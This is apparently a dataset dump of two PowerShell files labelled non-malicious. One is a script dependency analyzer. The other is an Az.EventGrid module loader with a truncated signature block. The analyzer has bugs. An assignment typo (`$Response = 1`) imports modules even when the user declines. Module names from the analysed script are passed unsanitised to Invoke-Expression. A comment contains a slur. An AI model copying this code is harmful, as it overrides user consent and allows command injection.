full_path
stringlengths 31
232
| filename
stringlengths 4
167
| content
stringlengths 0
48.3M
|
|---|---|---|
combined_dataset/train/non-malicious/Get-Dependency.ps1
|
Get-Dependency.ps1
|
$BuiltInAliases = @{}
$BuiltInCmdlets = @{}
$BuiltInFunctions = @{}
$BuiltInVariables = @{}
##############################################################################
#.SYNOPSIS
# Gets a list of tokenized strings from the specified PowerShell code sample
# which can be used for dependency analysis or other unique purposes.
#
#.DESCRIPTION
# This command will use the currently active PowerShell ISE editor tab if the
# current shell is PowerShell ISE and a block of code was not provided to
# the command.
#
#.PARAMETER Type
# If specified, returns only PSTokens of the specified type(s).
#
#.PARAMETER Token
# If specified, returns only PSTokens that contain the specified text.
#
#.PARAMETER Text
# The block of text to tokenize. If this parameter is not specified, and the
# current shell is PowerShell ISE, the current editor tab's text will be used
# otherwise, no output is returned.
#
#.PARAMETER Path
# Specifies the path to an item. Wildcards are permitted.
#
#.PARAMETER LiteralPath
# Specifies the path to an item. Unlike Path, the value of LiteralPath is
# used exactly as it is typed. No characters are interpreted as wildcards.
# If the path includes escape characters, enclose it in single quotation marks.
# Single quotation marks tell Windows PowerShell not to interpret any
# characters as escape sequences.
#
#.PARAMETER Lines
# If specified, returns only the tokens that are on one of the line numbers
# specified. This is useful for doing a two-pass check as in the first example
# which aims to list function declarations which consist of two related tokens,
# the keyword containing the word "function" and the command argument containing
# the function name. It is assumed they will both be on the same line.
#
#.EXAMPLE
# $FunctionLines = Get-PSToken -Type Keyword -Token function | %{ $_.StartLine }
# $FunctionNames = Get-PSToken -Type CommandArgument | ?{ $FunctionLines -contains $_.StartLine }
#
#.LINK
# Get-Dependency
#
#.RETURNVALUE
# A collection of PSTokens parsed from the source code.
##############################################################################
function Get-PSToken {
[CmdletBinding(DefaultParameterSetName='Selection')]
param(
[Parameter(Position=1)]
[String[]]$Type,
[Parameter(Position=2)]
[String[]]$Token,
[Parameter(ParameterSetName='Path', Mandatory=$true, ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)]
[String[]]$Path,
[Alias("PSPath")]
[Parameter(ParameterSetName='LiteralPath', Mandatory=$true, ValueFromPipelineByPropertyName=$true)]
[String[]]$LiteralPath,
[Parameter()]
[Int32[]]$Lines
)
process {
if ($PSCmdlet.ParameterSetName -eq 'Selection') {
if (-not $PSISE) { throw 'The Selection parameter set is not valid outside of the PowerShell ISE.' }
if (-not $PSISE.CurrentOpenedFile) { throw 'There is no file currently opened.' }
if (-not $PSISE.CurrentOpenedFile.IsSaved) { throw 'Please save the currently active document first.' }
if ($PSISE.CurrentOpenedFile.IsUntitled) { throw 'Please save the currently active document first.' }
$ResolvedPaths = @(Resolve-Path -LiteralPath $PSISE.CurrentOpenedFile.FullPath)
}
elseif ($PSCmdlet.ParameterSetName -match '^(Literal)?Path$') {
switch ($PSCmdlet.ParameterSetName) {
Path { $ResolvedPaths = @(Resolve-Path -Path $Path) }
LiteralPath { $ResolvePathArgs = @(Resolve-Path -LiteralPath $LiteralPath) }
}
}
# Delegate path expansion to Resolve-Path
foreach ($ResolvedPath in $ResolvedPaths) {
$ScriptContent = Get-Content $ResolvedPath
# Call the PSParser to tokenize!
$ParserErrors = [System.Management.Automation.PSParseError[]]@()
$ParserTokens = [System.Management.Automation.PSParser]::Tokenize($ScriptContent, [Ref]$ParserErrors)
# If there were any errors, write them out as warnings
for ($i=0; $i -lt $ParserErrors.Length; $i++) {
$ParserError = $ParserErrors[$i]
if (-not $ParserError.Token) { Write-Warning $ParserError.Message }
else { Write-Warning "($($ParserError.Token.StartLine), $($ParserError.Token.StartColumn)) $($ParserError.Message)" }
}
if (-not $ParserTokens.Count) { return }
# Filter the output
if ($Type.Length) { $ParserTokens = @($ParserTokens | ?{ $Type -contains $_.Type }) } # Filter By Type
if ($Token.Length) { $ParserTokens = @($ParserTokens | ?{ $Token -contains $_.Content }) } # Filter By Content
if ($Lines.Length) { $ParserTokens = @($ParserTokens | ?{ $Lines -contains $_.StartLine }) } # Filter By Line
if (-not $ParserTokens.Count) { return }
# Return the tokens, adding a Path property to each one
# that points back to the script or editor file
# note that text blocks will have a null path
$ParserTokens | Add-Member -PassThru NoteProperty Script (Split-Path -Leaf $ResolvedPath)
}
} # process
}
##############################################################################
#.SYNOPSIS
# Calculates the dependencies of a script file, block of PowerShell code, or
# an open PowerShell ISE document.
#
#.DESCRIPTION
# Before deploying a script or module, it is important to ensure that any
# external dependencies are resolved otherwise code that runs fine on your
# machine will bomb on someone else's. This function will scan a single
# level of dependencies from the specified script and by default returns
# any dependency that is 1) not a part of the built-in PowerShell command
# and variable configuration and 2) not defined in the script being analyzed.
# You can override this behavior and include these dependencies with the
# Force parameter.
#
#.PARAMETER Path
# Specifies the path to an item. Wildcards are permitted.
#
#.PARAMETER LiteralPath
# Specifies the path to an item. Unlike Path, the value of LiteralPath is
# used exactly as it is typed. No characters are interpreted as wildcards.
# If the path includes escape characters, enclose it in single quotation marks.
# Single quotation marks tell Windows PowerShell not to interpret any
# characters as escape sequences.
#
#.PARAMETER Text
# The block of text to tokenize. If this parameter is not specified, and the
# current shell is PowerShell ISE, the current editor tab's text will be used
# otherwise, no output is returned.
#
#.PARAMETER Unresolved
# When specified, only unresolved dependencies are returned.
#
#.PARAMETER Force
# When specified, all dependencies are included, even if they are known to
# be defined locally or in the default PowerShell configuration.
#
#.EXAMPLE
# Get-Dependency | Out-GridView
#
#.LINK
# Get-PSToken
#
#.RETURNVALUE
# An array of PSObjects containing information about the external dependencies.
##############################################################################
function Get-Dependency {
[CmdletBinding(DefaultParameterSetName='Selection')]
param(
[Parameter(ParameterSetName='Path', Position=1, Mandatory=$true, ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)]
[String[]]$Path,
[Alias("PSPath")]
[Parameter(ParameterSetName='LiteralPath', Mandatory=$true, ValueFromPipelineByPropertyName=$true)]
[String[]]$LiteralPath,
[Parameter()]
[Switch]$Unresolved,
[Parameter()]
[Switch]$Force
)
begin {
$Dependencies = New-Object System.Collections.ArrayList
$LocalFunctions = @{}
$ImportedAliases = @{}
$ImportedCmdlets = @{}
$ImportedFunctions = @{}
##############################################################################
#.SYNOPSIS
# Strips off the scope modifier of an identifier so its name can be checked.
##############################################################################
filter Normalize-Identifier([String]$Name) {
if ($_ -is [System.Management.Automation.PSToken]) { $Name = $_.Content }
if ($_ -is [String]) { $Name = $_ }
$Name -replace '^$?(Script|Global|Local):',''
}
##############################################################################
#.SYNOPSIS
# Wraps calls to Get-PSToken, making sure to use the appropriate parameter set.
##############################################################################
function Get-PSTokenProxy([String[]]$Type,[String[]]$Token,[Int32[]]$Lines) {
$GetPSTokenArgs = @{}
if ($Type.Length) { $GetPSTokenArgs['Type'] = $Type }
if ($Token.Length) { $GetPSTokenArgs['Token'] = $Token }
if ($Lines.Length) { $GetPSTokenArgs['Lines'] = $Lines }
$ResolvedPaths | Get-PSToken @GetPSTokenArgs
}
##############################################################################
#.SYNOPSIS
# Rebuilds the cache of built-in command, alias, function, and variable names
# that are present in an unconfigured PowerShell session so that they can
# be skipped from dependency checking.
##############################################################################
function Discover-BuiltInCommands {
if ($BuiltInCmdlets.Count -eq 0) {
$BuiltInAliases.Clear()
$BuiltInCmdlets.Clear()
$BuiltInFunctions.Clear()
$BuiltInVariables.Clear()
$Posh = [PowerShell]::Create()
try {
[Void]$Posh.AddScript('Get-Command -CommandType Cmdlet,Function,Alias')
foreach($CommandInfo in $Posh.Invoke()) {
switch($CommandInfo.CommandType) {
Alias { $BuiltInAliases[$CommandInfo.Name] = $true }
Cmdlet { $BuiltInCmdlets[$CommandInfo.Name] = $true }
Function { $BuiltInFunctions[$CommandInfo.Name] = $true }
}
}
[Void]$Posh.AddScript('Get-Variable')
foreach($VariableInfo in $Posh.Invoke()) {
$BuiltInVariables[$VariableInfo.Name] = $true
}
# Note: PSISE won't appear as a built-in variable this way
# I decided I actually prefer it that way. I want to know if
# I accidentially couple a script to the ISE
$BuiltInVariables['this'] = $true
}
finally {
$Posh.Dispose()
}
} # if count 0
}
##############################################################################
#.SYNOPSIS
# Scans the source code for Import-Module statements and gathers up the
# module export information into hashtables.
##############################################################################
function Discover-ModuleImports {
$ImportedAliases.Clear()
$ImportedCmdlets.Clear()
$ImportedFunctions.Clear()
$TokenLines = @(Get-PSTokenProxy Command Import-Module | %{$_.StartLine})
if (-not $TokenLines.Length) { return } # nothing to do
$TokenNames = @(Get-PSTokenProxy CommandArgument -Lines $TokenLines | Normalize-Identifier)
if (-not $TokenNames.Length) { return } # nothing to do
# Find out which referenced modules are not imported
$MissingModules = @()
foreach ($TokenName in $TokenNames) {
if (-not (Get-Module $TokenName)) {
$MissingModules += $TokenName
}
}
if ($MissingModules.Length) {
$MenuItem1 = New-Object System.Management.Automation.Host.ChoiceDescription "&No - Do Not Import Modules"
$MenuItem2 = New-Object System.Management.Automation.Host.ChoiceDescription "&Yes - Import These Modules"
[System.Management.Automation.Host.ChoiceDescription[]]$MenuItems = @($MenuItem1,$MenuItem2)
$MenuCaption = "Imported Modules Not Loaded"
$MenuMessage = "One or more modules imported by the script are not currently loaded.`r`n" +
"This can lead to unresolved external references and missing`r`n" +
"information in the dependency report.`r`n" +
"`r`n" +
"You can attempt to temporarily import the following modules into the`r`n" +
"session by selection the option below.`r`n" +
"`r`n"
foreach ($MissingModule in $MissingModules) {
$MenuMessage += " Import-Module $MissingModule`r`n"
}
# Show the menu
# If the user picks choice Y then import the modules
# Because you can't import modules into the global scope from a lower scope,
# the imported module will not be visible from outside of the current scope.
$Response = $Host.UI.PromptForChoice($MenuCaption, $MenuMessage, $MenuItems, 0)
if ($Response = 1) {
foreach ($MissingModule in $MissingModules) {
# Using Invoke-Expression so this Import-Module command
# doesn't cause a screw-up when checking dependencies of
# Dependency.psm1. Gay huh...
Invoke-Expression ".{Import-Module $MissingModule -ErrorAction Continue}"
}
}
}
$ImportedModules = @(Get-Module $TokenNames -ListAvailable) + @(Get-Module $TokenNames)
foreach ($ImportedModule in $ImportedModules) {
$ImportedModule.ExportedAliases.Values | %{ $ImportedAliases[$_.Name] = $_ }
$ImportedModule.ExportedCmdlets.Values | %{ $ImportedCmdlets[$_.Name] = $_ }
$ImportedModule.ExportedFunctions.Values | %{ $ImportedFunctions[$_.Name] = $_ }
}
}
##############################################################################
#.SYNOPSIS
# Scans the source code for function and filter keywords that define local
# functions that should not be treated as external dependencies.
##############################################################################
function Discover-LocalFunctions {
$LocalFunctions.Clear()
# Gather information about defined functions
$TokenLines = @(Get-PSTokenProxy Keyword function,filter | %{$_.StartLine})
if (-not $TokenLines.Length) { return } # nothing to do
$TokenNames = @(Get-PSTokenProxy CommandArgument -Lines $TokenLines | Normalize-Identifier)
if (-not $TokenNames.Length) { return } # nothing to do
# No CommandInfo for these so we'll just store a bool
foreach ($TokenName in $TokenNames) {
$LocalFunctions[$TokenName] = $true
}
}
##############################################################################
#.SYNOPSIS
# Removes references to built-in Cmdlets, functions, variables, etc from
# the input stream.
##############################################################################
filter Exclude-BuiltInReferences {
if ($Force) { return $_ }
$Token = $_
$TokenName = Normalize-Identifier $Token.Content
# Is it built in?
# If so, skip it.
if ($Token.Type -eq 'Command') {
if ($BuiltInAliases[$TokenName]) { return }
if ($BuiltInCmdlets[$TokenName]) { return }
if ($BuiltInFunctions[$TokenName]) { return }
}
elseif ($Token.Type -eq 'Variable') {
if ($BuiltInVariables[$TokenName]) { return }
}
$Token
}
##############################################################################
#.SYNOPSIS
# Removes references to locally defined functions from the input stream.
##############################################################################
filter Exclude-LocalReferences {
if ($Force) { return $_ }
$Token = $_
$TokenName = Normalize-Identifier $Token.Content
# Is it built in?
# If so, skip it.
if ($Token.Type -eq 'Command') {
if ($LocalFunctions[$TokenName]) { return }
}
$Token
}
##############################################################################
#.SYNOPSIS
# Gets a single command with the specified name, taking into account that the
# command name may need to have conflicting wildcard characters escaped and
# avoiding the error when a command does not exist.
##############################################################################
function Get-SafeCommand([String]$Name) {
$SafeName = [System.Management.Automation.WildcardPattern]::Escape($Name)
$CommandInfo = Get-Command -Name $SafeName -ErrorAction SilentlyContinue | Select -First 1
if (-not $CommandInfo) { $CommandInfo = $ImportedAliases[$Name] }
if (-not $CommandInfo) { $CommandInfo = $ImportedFunctions[$Name] }
if (-not $CommandInfo) { $CommandInfo = $ImportedCmdlets[$Name] }
$CommandInfo
}
##############################################################################
#.SYNOPSIS
# Gets a single variable with the specified name, taking into account that the
# variable name may need to have conflicting wildcard characters escaped and
# avoiding the error when a variable does not exist.
##############################################################################
function Get-SafeVariable([String]$Name) {
$SafeName = [System.Management.Automation.WildcardPattern]::Escape($Name)
$VariableInfo = Get-Variable -Name $SafeName -Scope Global -ErrorAction SilentlyContinue | Select -First 1
$VariableInfo
}
##############################################################################
#.SYNOPSIS
# Selects the first instance of each distinct combination of token type and
# content (function/variable name etc) and includes the line number of the
# first occurrence.
#
#.DESCRIPTION
# This is a basically just a ugly way of doing:
# SELECT Type,Content,Min(StartLine) FROM ... GROUP BY Type,Content
# Which PowerShell cannot easily represent as far as I know
##############################################################################
function Select-UniqueTokens {
$Input |
Group-Object Type,Content |
Select-Object @(
@{N='Type'; E={ $_.Group[0].Type } },
@{N='Content'; E={ $_.Group[0].Content } },
@{N='Script'; E={ $_.Group[0].Script } }
@{N='StartLine'; E={ $_.Group[0].StartLine } }
)
}
##############################################################################
#.SYNOPSIS
# Creates a new PSObject for holding information about the external dependency
##############################################################################
function New-Dependency($Token) {
# Create a PSObject to hold the values
# we will output from this function
New-Object PSObject |
Add-Member -PassThru NoteProperty Script ($Token.Script) |
Add-Member -PassThru NoteProperty Module ($null) |
Add-Member -PassThru NoteProperty Type ($Token.Type) |
Add-Member -PassThru NoteProperty Name (Normalize-Identifier $Token.Content) |
Add-Member -PassThru NoteProperty Target ($null) |
Add-Member -PassThru NoteProperty Resolved ($false) |
Add-Member -PassThru NoteProperty File ($null)
}
} # begin
process {
if ($PSCmdlet.ParameterSetName -eq 'Selection') {
if (-not $PSISE) { throw 'The Selection parameter set is not valid outside of the PowerShell ISE.' }
if (-not $PSISE.CurrentOpenedFile) { throw 'There is no file currently opened.' }
if (-not $PSISE.CurrentOpenedFile.IsSaved) { throw 'Please save the currently active document first.' }
if ($PSISE.CurrentOpenedFile.IsUntitled) { throw 'Please save the currently active document first.' }
$ResolvedPaths = @(Resolve-Path -LiteralPath $PSISE.CurrentOpenedFile.FullPath)
}
elseif ($PSCmdlet.ParameterSetName -match '^(Literal)?Path$') {
switch ($PSCmdlet.ParameterSetName) {
Path { $ResolvedPaths = @(Resolve-Path -Path $Path) }
LiteralPath { $ResolvedPaths = @(Resolve-Path -LiteralPath $LiteralPath) }
}
}
# Discover imported modules and function definitions
Discover-BuiltInCommands
Discover-ModuleImports
Discover-LocalFunctions
# Parse the source code
# Gives back command and variable references
$Tokens = @(
Get-PSTokenProxy Command,Variable |
Exclude-BuiltInReferences |
Exclude-LocalReferences |
Select-UniqueTokens
)
foreach ($Token in $Tokens) {
$Dependency = New-Dependency $Token
# HANDLE VARIABLE REFERENCES
if ($Token.Type -eq 'Variable') {
if ($VariableInfo = Get-SafeVariable $Dependency.Name) {
$Dependency.Module = $VariableInfo.ModuleName
$Dependency.Resolved = $true
}
else {
# Skip this dependency
# Could not find this variable in global state
# So we can only assume that the variable is
# localized somewhere and cannot really be
# resolved as an external dependency
# TODO: maybe look for a setter or arg name
# to determine if it's really external or not
continue
}
} # Token Type = Variable
# HANDLE COMMAND REFERENCES
if ($Token.Type -eq 'Command') {
if ($CommandInfo = Get-SafeCommand $Dependency.Name) {
$Dependency.Type= $CommandInfo.CommandType
$Dependency.Resolved = $true
# Is it an alias?
# If so, we want to resolve the target
if ($CommandInfo.CommandType -eq 'Alias') {
# Is the alias resolved?
if ($CommandInfo.ResolvedCommandName) {
# Is alias the same name as the target?
# If so, this is generally a disambiguating alias and can be ignored.
if ($CommandInfo.Name -eq $CommandInfo.ResolvedCommandName) {
if ($BuiltInAliases[$CommandInfo.ResolvedCommandName]) { continue }
if ($BuiltInCmdlets[$CommandInfo.ResolvedCommandName]) { continue }
if ($BuiltInFunctions[$CommandInfo.ResolvedCommandName]) { continue }
}
$Dependency.Target = $CommandInfo.ResolvedCommandName
$CommandInfo = $CommandInfo.ResolvedCommand
}
else {
# The alias points to an unresolved command
$Dependency.Resolved = $false
}
} # Command Type = Alias
# Command Source Info
# Note that in the case of resolved aliases, CommandInfo is now
# pointing to the resolved command and modules/paths/etc will reflect that
if ($CommandInfo.ModuleName) { $Dependency.Module = $CommandInfo.ModuleName }
if ($CommandInfo.ScriptBlock.File) { $Dependency.File = $CommandInfo.ScriptBlock.File }
if ($CommandInfo.Path) { $Dependency.File = $CommandInfo.Path }
if ($CommandInfo.DLL) { $Dependency.File = $CommandInfo.DLL }
} # Is Command Is Resolved
} # Token Type = Command
if ($Unresolved -and $Dependency.Resolved) { continue }
[Void]$Dependencies.Add($Dependency)
} # foreach Token
} # process
end {
# returns all output at the end
$Dependencies | Sort Script,Module,Type,Name
} # end
}
|
combined_dataset/train/non-malicious/sample_22_48.ps1
|
sample_22_48.ps1
|
# region Generated
# Load the private module dll
$null = Import-Module -PassThru -Name (Join-Path $PSScriptRoot '..\bin\Az.EventGrid.private.dll')
# Load the internal module
$internalModulePath = Join-Path $PSScriptRoot '..\internal\Az.EventGrid.internal.psm1'
if(Test-Path $internalModulePath) {
$null = Import-Module -Name $internalModulePath
}
# Export nothing to clear implicit exports
Export-ModuleMember
# Export script cmdlets
Get-ChildItem -Path $PSScriptRoot -Recurse -Include '*.ps1' -File | ForEach-Object { . $_.FullName }
Export-ModuleMember -Function (Get-ScriptCmdlet -ScriptFolder $PSScriptRoot) -Alias (Get-ScriptCmdlet -ScriptFolder $PSScriptRoot -AsAlias)
# endregion
# SIG # Begin signature block
# MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCACHuaswefeF1Kt
# k2EjCbzNvcNdkBvLHpye0ozoWUcfyqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIEdCpa81OdqVzNy2+zv8st8+
# qMAWdi8VPuSEkG5CadXyMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEATolWZwlriEeJVLJUMbFX9Lad8M2Y73lhXuYb+ifWRY2nDPg3lEO00PYc
# MJzmZ6J92UTOuXJSkr/SDshFM5+jBO9UKQa3L/4jJ8DAKWs6g4mSv5YfBrftfFyr
# KX25Mkb76ABr1hSafeanshVtJdq4xtdCxf+E1ceiQjH/by+PedXm/nGjmNp2OyTQ
# 39dZO7sZNytWYD6rpgnXdkgD5DbTjCSOsfFboOf4pt8J0VWIQLP3hOgJqVMaJnf5
# cGnumyPjoG9L6DXVX8rpsf40elmWOC05UslNWYM8Zpt1ruDGK+HOCSHKF3yhrQ6R
# eJ7JSn5dc3IKj4wYgaeA0440H5I0KaGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC
# FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq
# hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCC4y1Bi1CQZ5M0MLnT6AFv3ckqu9/Iovt/f90zmmMEM8QIGZjOqm5pH
# GBMyMDI0MDUxNjA2NDIxOS4zNjRaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
